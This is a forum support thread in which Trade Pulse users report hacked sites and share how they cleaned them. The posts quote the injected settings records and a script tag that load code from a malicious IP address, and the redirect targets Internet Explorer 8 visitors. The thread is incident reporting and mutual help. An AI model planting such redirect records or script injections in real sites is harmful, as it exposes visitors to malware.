Script Pulse
Trade Pulse => Trade Pulse Support => Topic started by: Shoplifter on April 25, 2014, 08:58:23 PM
-
Nearly every one of my TP sites now seems to have files /tp/data/settings/ modified to add a virus site.
For example:
/tp/data/settings/out_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/outconf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}
/tp/data/settings/in_conf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/out_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}
I gather that this may redirect that particular user agent to the attack site. In fact the user agent redirect setting in both the in and out areas of the tp control panel are selected.
It seems that the attacker has added a record to the data files in /tp/data/settings to do this. These files are all chmod 777 even if the TP install is locked. Classy stuff, whoever did this knows the software well.
-
sent to kildoozer, I checked mine and 10 other clients sites and they look clean(regarding your tp forum topic), so it must be isolated thing, if files are locked its impossible to change them with script, only with ftp/ssh access!
-
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.
-
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.
Sending now.
I cleaned it out by going into the admin and disabling the redirects. So far so good. I double checked the lock and ran lock.php again but the files in /data/settings are all 777
-
Im getting the same, now google has put a warning next to my site in the search engine , webmaster tools saying it has malware, mainly this! <script type="text/javascript" src="http://37.9.53.204/mobile.php?niche=js">
-
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?
-
How do you clean it out?
-
How do you clean it out?
Just deleted "Redirect by User Agent" in Settings -> IN and Settings -> Out. Then deleted iframe code from Tools -> Toplists -> top.html. Then I went to google webmasters tools and sent the request to rescan my sites to delete the virus warning (and they have approved it).
But we need to close this backdoor.
-
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
-
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
-
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
Thing is it has always been unchecked...
-
My traffic has halved and do not know where to look or how to get rid of it! Thanks for the help so far guys :)
Update: Untill TP get this sorted have taken the trade pulse include out of my site for now, until it safe to put back, have resubmitted site to google...waiting to see if they approve it!
-
Ok found the code in my toplist template, just deleted it hoping its clean for now!
-
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
I unchecked it, and hit submit, it went through google warning, i clicked "ignore" and went ahead, the "Redirect by User Agent" came checked again. any idea?
-
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?
That is a good question. I feel the attacker is getting in through some sort of back door, I can't believe he managed to get the admin passes for my sites as well as for other TP users.
-
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
I unchecked it, and hit submit, it went through google warning, i clicked "ignore" and went ahead, the "Redirect by User Agent" came checked again. any idea?
Try to open the page in browser without google "control" (e.g. IE).
-
Simply clean your sites, and make sure TP install is locked as described on forum. This is not TP hack, check your other scripts for backdoors and make sure someone didn't get your ftp user/pass!!!